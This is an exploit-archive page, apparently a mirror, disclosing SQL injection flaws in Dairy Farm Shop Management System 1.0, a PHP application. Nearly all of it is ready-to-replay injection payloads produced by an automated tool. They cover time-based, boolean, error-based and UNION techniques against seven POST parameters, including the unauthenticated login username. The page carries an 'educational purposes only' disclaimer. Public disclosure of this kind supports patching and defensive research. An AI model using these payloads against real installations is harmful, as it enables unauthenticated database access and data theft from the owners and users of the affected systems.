Exploits / Vulnerability Discovered : 2020-01-06 |
Type : webapps |
Platform : php
This exploit / vulnerability Dairy farm shop management system 1.0 username sql injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Dairy Farm Shop Management System 1.0 - 'username' SQL Injection
# Google Dork: N/A
# Date: 2020-01-03
# Exploit Author: Chris Inzinga
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
# Version: v1.0
# Tested on: Windows
# CVE: N/A
# The Dairy Farm Shop Management System 1.0 web application is vulnerable to
# SQL injection in multiple areas. The most severe of these is the username
# parameter on the login page as this injection can be done unauthenticated.
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=test' AND (SELECT 5667 FROM (SELECT(SLEEP(5)))mKGL) AND 'UlkV'='UlkV&password=test&login=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
---
Parameter: category (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category=test' AND (SELECT 8892 FROM (SELECT(SLEEP(5)))WzFH) AND 'NELe'='NELe&categorycode=test&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
---
Parameter: categorycode (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category=test&categorycode=test' AND (SELECT 9140 FROM (SELECT(SLEEP(5)))bzQA) AND 'izaK'='izaK&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
---
Parameter: companyname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: companyname=test' AND (SELECT 7565 FROM (SELECT(SLEEP(5)))znna) AND 'bEUm'='bEUm&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
---
Parameter: productname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category=Milk&company=Amul&productname=test' AND (SELECT 1171 FROM (SELECT(SLEEP(5)))rlQI) AND 'RgaN'='RgaN&productprice=test&submit=
---
---
Parameter: productprice (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category=Milk&company=Amul&productname=test&productprice=test' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))BRuk) AND 'Imqh'='Imqh&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
---
Parameter: todate (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: fromdate=2020-01-05&todate=-6737' OR 3099=3099#&submit=
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: fromdate=2020-01-05&todate=2020-01-31' OR (SELECT 3665 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(3665=3665,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mqby&submit=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=2020-01-05&todate=2020-01-31' AND (SELECT 5717 FROM (SELECT(SLEEP(5)))adaE)-- cLAK&submit=
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: fromdate=2020-01-05&todate=2020-01-31' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x666369456150614b454a4f51454e6e687449724a786445585455515a67614162754545716d476f6f,0x716a7a7171),NULL#&submit=
Parameter: fromdate (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: fromdate=2020-01-05' AND (SELECT 7128 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(7128=7128,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Tzxh&todate=2020-01-31&submit=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=2020-01-05' AND (SELECT 7446 FROM (SELECT(SLEEP(5)))Aklw)-- uzkF&todate=2020-01-31&submit=
---